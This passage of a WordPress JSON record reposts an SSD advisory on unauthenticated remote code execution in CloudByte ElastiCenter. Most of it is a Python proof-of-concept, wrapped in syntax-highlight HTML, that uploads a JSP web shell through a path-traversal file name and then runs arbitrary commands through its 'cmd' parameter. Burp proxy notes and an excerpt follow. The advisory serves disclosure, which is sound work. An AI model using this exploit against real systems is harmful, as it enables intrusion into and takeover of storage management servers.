https:\/\/192.168.200.200\/ &#8220;uname -a&#8221;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-37\"><span class=\"crayon-v\">xurl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-38\"><span class=\"crayon-v\">xcmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-40\"><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-41\">&nbsp;<\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-42\"><span class=\"crayon-v\">files<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;fileToUpload&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;..\/..\/images\/v2.jsp&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">jspshell<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;mainui&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;mainui&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-43\"><span class=\"crayon-v\">g<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xurl<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">UPPATH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-44\">&nbsp;<\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-45\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xurl<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&quot;\/client\/images\/v2.jsp?cmd=&quot;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xcmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-46\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>On some recent Linux versions (Debian\/Kali 2.0) you may run into SSL issues:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2.png\" data-slb-active=\"1\" data-slb-asset=\"1356336615\" data-slb-internal=\"0\" data-slb-group=\"3737\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3740\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2-300x74.png\" alt=\"\" width=\"794\" height=\"196\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2-300x74.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc2.png 970w\" sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/a><\/p>\n<p>To work around this issue, run your favorite HTTP proxy (we use burpsuite on Kali 2.0).<br \/> Leave the defaults for burpsuite (listening 
on 127.0.0.1:8080), and set the proxy via the environment variables.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3.png\" data-slb-active=\"1\" data-slb-asset=\"865060411\" data-slb-internal=\"0\" data-slb-group=\"3737\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3742\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3-300x117.png\" alt=\"\" width=\"613\" height=\"239\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3-300x117.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc3.png 594w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/a><\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3737\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1-300x58.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 23 Aug 2018 10:57:33 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two vulnerabilities found in ElastiCenter, ElastiStor&#8217;s management console, File Injection that leads to unauthenticated remote code execution. ElastiCenter is the centralized management tool that you use to configure, monitor, manage, and deploy the services provided by CloudByte ElastiStor. 
ElastiCenter lets you: Use the Graphical User Interface to manage the &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3737\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 CloudByte ElastiStor OS Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-13181","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13181"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13181\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13181"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
